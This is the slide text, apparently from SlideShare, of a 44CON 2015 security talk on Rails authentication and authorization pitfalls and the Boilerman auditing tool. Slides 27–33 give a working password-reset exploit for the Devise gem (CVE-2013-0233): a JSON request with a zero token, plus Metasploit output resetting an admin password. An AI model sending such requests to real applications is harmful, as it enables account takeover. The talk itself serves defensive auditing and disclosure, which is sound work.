SlideShare a Scribd company logo

44CON London 2015 - Going AUTH the Rails on a Crazy Train

44CON
44CON

Going AUTH the Rails on a Crazy Train by Tomek Rabczak & Jeff Jarmoc

Technology
1 of 52
Download to read offline
Going AUTH the Rails on a Crazy Train Tomek Rabczak @sigdroid Jeff Jarmoc @jjarmoc September, 2015
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Who we are Tomek Rabczak Senior Security Consultant with NCC Group Ex-Rails Maker turned Rails Breaker Jeff Jarmoc Senior Security Consultant with NCC Group Occasional contributor to Metasploit, Brakeman NCC Group UK Headquarters, Worldwide Offices Software Escrow, Testing, Domain Services 2
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train All Aboard, hahaha! 1. Rails Introduction 2. Authentication 3. Authorization 4. Boilerman: A New Dynamic Analysis Tool 3
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train `rails  new  sample_app` sample_app   app/   models/   views/   controllers/ 4 Root directory Application files (Your code) Models (Objects, usually backed by DB) Views (Output presentation templates) Controllers (Ties Models and Views with Actions) Configuration files directory Maps URLs to Controller Actions Dependency record of Gem requirements Specific versions of currently installed Gems …   config/    routes.rb   …   Gemfile   Gemfile.lock
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train The ‘Rails Way’ 5 ActiveRecord (Model) SQLi protection via ORM-managed queries (see http://rails-sqli.org/) ActionView (View) XSS protection via default HTML-output encoding ActionController (Controller) CSRF protections via protect_from_forgery
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Goin’ off the Rails Authentication (AUTHN) Who is the user? Only HTTP Basic & Digest natively Authorization (AUTHZ) What can they do? No native facility 6
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Laying More Track - AUTHN Option 1 - Roll your own Re-invents the wheel, risks common mistakes Lots more to AUTHN than checking/ storing passwords has_secure_password in >= 3.1 helps 7
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Laying More Track - AUTHN 8 Option 2 - Use a gem Vulnerabilities are far-reaching Ongoing updates/maintenance required Integration can be tricky Core code is generally well vetted Encapsulates past community experience
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Common AUTHN Gems Devise Most popular, built on Warden OmniAuth Multi-Provider, OAuth focused DoorKeeper OAuth2 provider for Rails AuthLogic Adds a new model blending Sessions w/ Auth 9
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Arguments for writing “For one, practical experience shows that authentication on most sites requires extensive customization, and modifying a third-party product is often more work than writing the system from scratch. In addition, off-the-shelf systems can be “black boxes”, with potentially mysterious innards; when you write your own system, you are far more likely to understand it.” 10 https://www.railstutorial.org/book/modeling_users#sec-adding_a_secure_password
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Write our own 11 http://api.rubyonrails.org/v3.1.0/classes/ActiveModel/SecurePassword/ClassMethods.html http://chargen.matasano.com/chargen/2015/3/26/enough-with-the-salts-updates-on-secure-password-schemes.html Digests stored with BCrypt Schema: User(name:string, password_digest:string)
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Lots more needed. Storing Creds and Authenticating is just the start #TODO Session management Complexity requirements Lost/Forgotten Password handling API Tokens / MFA / 2FA / OAUTH 12
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Session Management 1. Exchange credentials for a token (cookie). 2. Identify user by that token on subsequent requests. 3. Invalidate that token when needed. Logout or Timeout 4. Where we store session state varies 13
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Encrypted Cookie Sessions 14 ozzy@ozzy.com *********
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Database Sessions 15 ozzy@ozzy.com *********
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Database vs. Cookies 16 Database Cookie User Cookie Random Token Encrypted Serialized Session Object Revocation Maximum Lifetime (Config) One Concurrent Delete From DB Maximum Lifetime (Config) Unlimited Concurrent Attack Surface Theft / Enumeration Theft / Enumeration Cryptographic Attacks Long/Infinite Lived Sessions Encryption Key Exposure *Deserialization Vulns Per-Request Overhead DB query (caching may help) Signature Validation Decryption Deserialization
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Session Type Config config/initializers/session_store.rb: Rails.application.config.session_store  :cookie_store,   key:  ‘_session_cookie_name’,   :expire_after  =>  2.hours 17 or   :active_record_store Session Expiry Time Must be Manually Configured!
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Cookie Session Config 18 config/secrets.yml: production:      secret_key_base:  'secret  key’ Signed, Not Encrypted! production:      secret_token:  'secret  key' config/initializer/session_store.rb: Rails.application.config.action_dispatch.cookies_serializer  =  :json RCE w/ Key Exposure!  :marshal      or   :hybrid
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Lost/Forgotten Passwords Password Hints Change and email PW “Secret” Questions 19 CAUTION
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Lost/Forgotten Passwords 20 1) Generate CSPRNG token => User object w/ timestamp 2) Transmit to user out of band (email, SMS, etc) 3) User visits site w/ token 4) User.find_by_token(), verify expiration, change password 5) Delete Token GOOD
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Installing Devise Gemfile gem  'devise'   Commands rails  generate  devise:install   rails  generate  devise  User   Config Initializer:  config/initializers/devise.rb ActionMailer: config/environments/<environment>.rb Initialize Database rake  db:migrate 21
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train app/models/User.rb 22
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Routes 23 app/config/routes.rb: devise_for  :users
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Using Devise Controller Filter before_action  :authenticate_user!   Often put in ApplicationController Skip where anonymous access needed Helpers user_signed_in?   current_user   user_session 24
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Devise Security History Unreleased/HEAD Optionally send password change notifications 3.5.1 Remove active tokens on email/password change 3.1.2 Addresses an email enumeration bug 3.1.0 Stores HMAC of tokens, instead of plain-text token 3.0.1 Fixes CSRF Token Fixation 2.2.3 Fixes a type confusion vulnerability 25 Disclosed by @joernchen of Phenoelit Feb 5th, 2013 http://www.phenoelit.org/blog/archives/2013/02/05/ mysql_madness_and_rails/
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Devise Password Reset Pseudo-Code 26
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train MySQL Equality 27 mysql>  select  "foo"  from  dual  where  1="1string";   +-­‐-­‐-­‐-­‐-­‐+   |  foo  |   +-­‐-­‐-­‐-­‐-­‐+   |  foo  |   +-­‐-­‐-­‐-­‐-­‐+   1  row  in  set,  1  warning  (0.00  sec) mysql>  select  "foo"  from  dual  where  0="string";   +-­‐-­‐-­‐-­‐-­‐+   |  foo  |   +-­‐-­‐-­‐-­‐-­‐+   |  foo  |   +-­‐-­‐-­‐-­‐-­‐+   1  row  in  set,  1  warning  (0.00  sec)
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Exploiting in Rails params[] A hash of (usually) strings containing values of user-supplied parameters 28 Like this /example?foo=bar&fizz=buzz   params  =>  {"foo"=>"bar",  “fizz"=>"buzz"}   /example?foo=1&fizz=2   params  =>  {"foo"=>"1",  "fizz"=>"2"}
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Exploiting in Rails Rails Magic XML (<4.0) and JSON (all versions) bodies parsed automatically Typecast per those formats 29 Like this POST  /example  HTTP/1.1   content-­‐type:  application/xml   <foo>bar</foo>   <fizz  type=“integer”>1</fizz>   params  =>  {"foo"=>"bar",  “fizz"=>1}  
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Devise Password Reset Exploit How about this? PUT  /users/password  HTTP/1.1   content-­‐type:  application/json   {"user":{   "password":"GAMEOVER",   "password_confirmation":"GAMEOVER",   “reset_password_token":0}   }   30
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Devise Password Reset Exploit params[] => {"user"=>{"password"=>"GAMEOVER",   "password_confirmation"=>"GAMEOVER",   “reset_password_token”=>0}} 31 Query User.find_by_token(0)   SELECT  *  from  Users  where  token=0  limit  1; Result Resets password of first User with an outstanding token!
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Metasploit module rails_devise_pass_reset.rb Clears any outstanding tokens Generates a token for a user of your choosing Resets password to token of your choosing Legitimate user *WILL* get emails 32 msf  auxiliary(rails_devise_pass_reset)  >  exploit   [*]  Clearing  existing  tokens...   [*]  Generating  reset  token  for  admin@example.com...   [+]  Reset  token  generated  successfully   [*]  Resetting  password  to  "w00tw00t"...   [+]  Password  reset  worked  successfully   [*]  Auxiliary  module  execution  completed
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Password Reset Type Confusion Patched in Devise >= v2.2.3, v2.1.3, v2.0.5 and v1.5.4 CVE-2013-0233 33 Fixed in Rails = 3.2.12 https://github.com/rails/rails/pull/9208 >= 4.2.0 https://github.com/rails/rails/pull/16069 Reverted in Rails >= 3.2.13 https://github.com/rails/rails/issues/9292 Core vulnerability effects more than just Devise! User.where(“token=?”, params[token]) Thanks to @joernchen of Phenoelit
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Authorization What can they do? Often tied to the concept of roles 34 Vertical Authorization Site Admin (Full Access) Organization Admin (Full Access to specific Org) “Regular User” (Limited Read Access + Local Write Access) Unauthenticated (No Access) Horizontal Authorization Org1 vs Org2 Data Within an Org, User1 vs User2 Data
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Authorization - Rails 35 Vertical Authorization before_actions Horizontal Authorization Associations
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Controller Routing Given a route: get '/posts', to: 'posts#index' 36 Method path controller # action
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Controller Hierarchy 37
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train How they work 3 types of callbacks - :before,  :around,  :after - Authorization tends to only care about before_actions 38 -­‐  before_action  :authorize_user,  only:  [:action1,  :action2,  …]   -­‐  before_action  :authorize_user,  except:  [:action1,  :action2,  …] -­‐  before_action  :authorize_user,  if:  method_call   -­‐  before_action  :authorize_user,  unless:  method_call -­‐  skip_before_action  :authorize_user,  only:  [:action1,  :action2,  …]   -­‐  skip_before_action  :authorize_user,  except:  [:action1,  :action2,  …] -­‐  before_action  :authorize_user,  Proc.new  {|controller|  #AUTHZ  Logic…  } http://api.rubyonrails.org/classes/ActiveSupport/Callbacks.html Different flavors
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Authorization Gems Pundit - Enforced through the use of Policy classes  @post  =  Post.find(params[:id])    authorize  @post   - https://github.com/elabs/pundit CanCan(Can) - Enforced through the use of an Ability class - https://github.com/CanCanCommunity/cancancan 39
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train CanCanCan Basics 40
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… find_by methods called directly on the model 41 GOOD CAUTION
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… before_action  …  only:  [:action1,  :action2] 42 CAUTION GOOD
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… Lightweight Controllers 43 GOOD CAUTION
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… Authorization Logic in Views 44 Ensure the application is also verifying permissions in controller action CAUTION
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… Skipping of filters 45 Skips the :authorize_admin filter for every action can be an artifact left over from testing/development
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Rails Scaffolding 46
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… /app/views/bank_accts/show.json.jbuilder: json.extract  @bank_acct,  :id,  :acct_number,  :acct_balance,  :acct_holder_name,  … 47 http://rubyjunky.com/rails-scaffold-dangerous-defaults.html?utm_source=rubyweekly&utm_medium=email Possible unwanted attributes added to view or strong_parameters Generator/Scaffold artifacts
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train New Tool: Boilerman Before Boilerman Audit every Controller manually Track inheritance / overrides Mind the gaps 48 https://github.com/tomekr/boilerman With Boilerman Dynamically resolve callbacks See all filters for a given Controller#Action Filter the list dynamically In browser or Rails Console
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train New Tool: Boilerman Dynamic analysis tool Plugs into an existing Rails application Rails console access needed As a minimum requirement Mounted as a Rails engine Accessed at /boilerman   or through Rails Console 49 https://github.com/tomekr/boilerman
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Boilerman Demo Praise be to the almighty demo gods. 50
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Boilerman Install: gem  install  boilerman   Takeaways Rails console can be a very powerful tool Future Ideas D3 visualizations matrix of Controller#Action & Filter pairs Source querying via pry’s source functionality Useful for auditing Pundit based authorization schemes 51
Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Questions? 52 Tomek Rabczak @sigdroid Jeff Jarmoc @jjarmoc

Recommended

The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019Viktor Todorov
 
Web::Scraper
Web::ScraperWeb::Scraper
Web::ScraperTatsuhiko Miyagawa
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solrtomhill
 
Perl comet
Perl cometPerl comet
Perl cometMarian Marinov
 
MITH Digital Dialogues: Intro to Programming for Humanists (with Ruby)
MITH Digital Dialogues: Intro to Programming for Humanists (with Ruby)MITH Digital Dialogues: Intro to Programming for Humanists (with Ruby)
MITH Digital Dialogues: Intro to Programming for Humanists (with Ruby)joegilbert
 
Ruby HTTP clients comparison
Ruby HTTP clients comparisonRuby HTTP clients comparison
Ruby HTTP clients comparisonHiroshi Nakamura
 
Speedy TDD with Rails
Speedy TDD with RailsSpeedy TDD with Rails
Speedy TDD with RailsPatchSpace Ltd
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 

Recommended

The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019Viktor Todorov
 
Web::Scraper
Web::ScraperWeb::Scraper
Web::ScraperTatsuhiko Miyagawa
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solrtomhill
 
Perl comet
Perl cometPerl comet
Perl cometMarian Marinov
 
MITH Digital Dialogues: Intro to Programming for Humanists (with Ruby)
MITH Digital Dialogues: Intro to Programming for Humanists (with Ruby)MITH Digital Dialogues: Intro to Programming for Humanists (with Ruby)
MITH Digital Dialogues: Intro to Programming for Humanists (with Ruby)joegilbert
 
Ruby HTTP clients comparison
Ruby HTTP clients comparisonRuby HTTP clients comparison
Ruby HTTP clients comparisonHiroshi Nakamura
 
Speedy TDD with Rails
Speedy TDD with RailsSpeedy TDD with Rails
Speedy TDD with RailsPatchSpace Ltd
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Torquebox OSCON Java 2011
Torquebox OSCON Java 2011Torquebox OSCON Java 2011
Torquebox OSCON Java 2011tobiascrawley
 
Burp plugin development for java n00bs (44 con)
Burp plugin development for java n00bs (44 con)Burp plugin development for java n00bs (44 con)
Burp plugin development for java n00bs (44 con)Marc Wickenden
 
Building Realtime Apps with Ember.js and WebSockets
Building Realtime Apps with Ember.js and WebSocketsBuilding Realtime Apps with Ember.js and WebSockets
Building Realtime Apps with Ember.js and WebSocketsBen Limmer
 
Torquebox @ Raleigh.rb - April 2011
Torquebox @ Raleigh.rb - April 2011Torquebox @ Raleigh.rb - April 2011
Torquebox @ Raleigh.rb - April 2011tobiascrawley
 
CouchDB Google
CouchDB GoogleCouchDB Google
CouchDB GoogleSteve Souders
 
Intro to PSGI and Plack
Intro to PSGI and PlackIntro to PSGI and Plack
Intro to PSGI and PlackTatsuhiko Miyagawa
 
Ruby HTTP clients
Ruby HTTP clientsRuby HTTP clients
Ruby HTTP clientsZoran Majstorovic
 
Information security programming in ruby
Information security programming in rubyInformation security programming in ruby
Information security programming in rubyHiroshi Nakamura
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
Torquebox @ Charlotte.rb May 2011
Torquebox @ Charlotte.rb May 2011Torquebox @ Charlotte.rb May 2011
Torquebox @ Charlotte.rb May 2011tobiascrawley
 
Devignition 2011
Devignition 2011Devignition 2011
Devignition 2011tobiascrawley
 
Performance Improvements in Browsers
Performance Improvements in BrowsersPerformance Improvements in Browsers
Performance Improvements in Browsersjeresig
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydn|u - The Open Security Community
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsBen Ramsey
 
Servlet 3.1 Async I/O
Servlet 3.1 Async I/OServlet 3.1 Async I/O
Servlet 3.1 Async I/OSimone Bordet
 
Foomo / Zugspitze Presentation
Foomo / Zugspitze PresentationFoomo / Zugspitze Presentation
Foomo / Zugspitze Presentationweareinteractive
 
Complex Made Simple: Sleep Better with TorqueBox
Complex Made Simple: Sleep Better with TorqueBoxComplex Made Simple: Sleep Better with TorqueBox
Complex Made Simple: Sleep Better with TorqueBoxbobmcwhirter
 
Burp suite
Burp suiteBurp suite
Burp suitehamdi_sevben
 
JRuby and You
JRuby and YouJRuby and You
JRuby and YouHiro Asari
 
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...bobmcwhirter
 
Toppling Domino - 44CON 4012
Toppling Domino - 44CON 4012Toppling Domino - 44CON 4012
Toppling Domino - 44CON 401244CON
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON
 

More Related Content

What's hot

Torquebox OSCON Java 2011
Torquebox OSCON Java 2011Torquebox OSCON Java 2011
Torquebox OSCON Java 2011tobiascrawley
 
Burp plugin development for java n00bs (44 con)
Burp plugin development for java n00bs (44 con)Burp plugin development for java n00bs (44 con)
Burp plugin development for java n00bs (44 con)Marc Wickenden
 
Building Realtime Apps with Ember.js and WebSockets
Building Realtime Apps with Ember.js and WebSocketsBuilding Realtime Apps with Ember.js and WebSockets
Building Realtime Apps with Ember.js and WebSocketsBen Limmer
 
Torquebox @ Raleigh.rb - April 2011
Torquebox @ Raleigh.rb - April 2011Torquebox @ Raleigh.rb - April 2011
Torquebox @ Raleigh.rb - April 2011tobiascrawley
 
Information security programming in ruby
Information security programming in rubyInformation security programming in ruby
Information security programming in rubyHiroshi Nakamura
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
Torquebox @ Charlotte.rb May 2011
Torquebox @ Charlotte.rb May 2011Torquebox @ Charlotte.rb May 2011
Torquebox @ Charlotte.rb May 2011tobiascrawley
 
Performance Improvements in Browsers
Performance Improvements in BrowsersPerformance Improvements in Browsers
Performance Improvements in Browsersjeresig
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsBen Ramsey
 
Servlet 3.1 Async I/O
Servlet 3.1 Async I/OServlet 3.1 Async I/O
Servlet 3.1 Async I/OSimone Bordet
 
Foomo / Zugspitze Presentation
Foomo / Zugspitze PresentationFoomo / Zugspitze Presentation
Foomo / Zugspitze Presentationweareinteractive
 
Complex Made Simple: Sleep Better with TorqueBox
Complex Made Simple: Sleep Better with TorqueBoxComplex Made Simple: Sleep Better with TorqueBox
Complex Made Simple: Sleep Better with TorqueBoxbobmcwhirter
 
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...bobmcwhirter
 

What's hot (20)

Torquebox OSCON Java 2011
Torquebox OSCON Java 2011Torquebox OSCON Java 2011
Torquebox OSCON Java 2011
 
Burp plugin development for java n00bs (44 con)
Burp plugin development for java n00bs (44 con)Burp plugin development for java n00bs (44 con)
Burp plugin development for java n00bs (44 con)
 
Building Realtime Apps with Ember.js and WebSockets
Building Realtime Apps with Ember.js and WebSocketsBuilding Realtime Apps with Ember.js and WebSockets
Building Realtime Apps with Ember.js and WebSockets
 
Torquebox @ Raleigh.rb - April 2011
Torquebox @ Raleigh.rb - April 2011Torquebox @ Raleigh.rb - April 2011
Torquebox @ Raleigh.rb - April 2011
 
CouchDB Google
CouchDB GoogleCouchDB Google
CouchDB Google
 
Intro to PSGI and Plack
Intro to PSGI and PlackIntro to PSGI and Plack
Intro to PSGI and Plack
 
Ruby HTTP clients
Ruby HTTP clientsRuby HTTP clients
Ruby HTTP clients
 
Information security programming in ruby
Information security programming in rubyInformation security programming in ruby
Information security programming in ruby
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTP
 
Torquebox @ Charlotte.rb May 2011
Torquebox @ Charlotte.rb May 2011Torquebox @ Charlotte.rb May 2011
Torquebox @ Charlotte.rb May 2011
 
Devignition 2011
Devignition 2011Devignition 2011
Devignition 2011
 
Performance Improvements in Browsers
Performance Improvements in BrowsersPerformance Improvements in Browsers
Performance Improvements in Browsers
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhyd
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your Apps
 
Servlet 3.1 Async I/O
Servlet 3.1 Async I/OServlet 3.1 Async I/O
Servlet 3.1 Async I/O
 
Foomo / Zugspitze Presentation
Foomo / Zugspitze PresentationFoomo / Zugspitze Presentation
Foomo / Zugspitze Presentation
 
Complex Made Simple: Sleep Better with TorqueBox
Complex Made Simple: Sleep Better with TorqueBoxComplex Made Simple: Sleep Better with TorqueBox
Complex Made Simple: Sleep Better with TorqueBox
 
Burp suite
Burp suiteBurp suite
Burp suite
 
JRuby and You
JRuby and YouJRuby and You
JRuby and You
 
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...
TorqueBox: The beauty of Ruby with the power of JBoss. Presented at Devnexus...
 

Viewers also liked

Toppling Domino - 44CON 4012
Toppling Domino - 44CON 4012Toppling Domino - 44CON 4012
Toppling Domino - 44CON 401244CON
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON
 
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...44CON
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON
 
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON
 

Viewers also liked (6)

Toppling Domino - 44CON 4012
Toppling Domino - 44CON 4012Toppling Domino - 44CON 4012
Toppling Domino - 44CON 4012
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
 
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
 
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
 

Similar to 44CON London 2015 - Going AUTH the Rails on a Crazy Train

Deploying JRuby Web Applications
Deploying JRuby Web ApplicationsDeploying JRuby Web Applications
Deploying JRuby Web ApplicationsJoe Kutner
 
Introducción a Wiremock
Introducción a WiremockIntroducción a Wiremock
Introducción a WiremockJose Ortiz
 
Deploy, Scale and Sleep at Night with JRuby
Deploy, Scale and Sleep at Night with JRubyDeploy, Scale and Sleep at Night with JRuby
Deploy, Scale and Sleep at Night with JRubyJoe Kutner
 
Socket applications
Socket applicationsSocket applications
Socket applicationsJoão Moura
 
Rapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesRapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesciklum_ods
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Camel and JBoss
Camel and JBossCamel and JBoss
Camel and JBossJBug Italy
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?Ronny
 
Crushing Latency with Vert.x
Crushing Latency with Vert.xCrushing Latency with Vert.x
Crushing Latency with Vert.xPaulo Lopes
 
A rough guide to JavaScript Performance
A rough guide to JavaScript PerformanceA rough guide to JavaScript Performance
A rough guide to JavaScript Performanceallmarkedup
 
SD, a P2P bug tracking system
SD, a P2P bug tracking systemSD, a P2P bug tracking system
SD, a P2P bug tracking systemJesse Vincent
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...Magno Logan
 
Hands on with CoAP and Californium
Hands on with CoAP and CaliforniumHands on with CoAP and Californium
Hands on with CoAP and CaliforniumJulien Vermillard
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesLogan Best
 
TorqueBox at DC:JBUG - November 2011
TorqueBox at DC:JBUG - November 2011TorqueBox at DC:JBUG - November 2011
TorqueBox at DC:JBUG - November 2011bobmcwhirter
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moondavejohnson
 
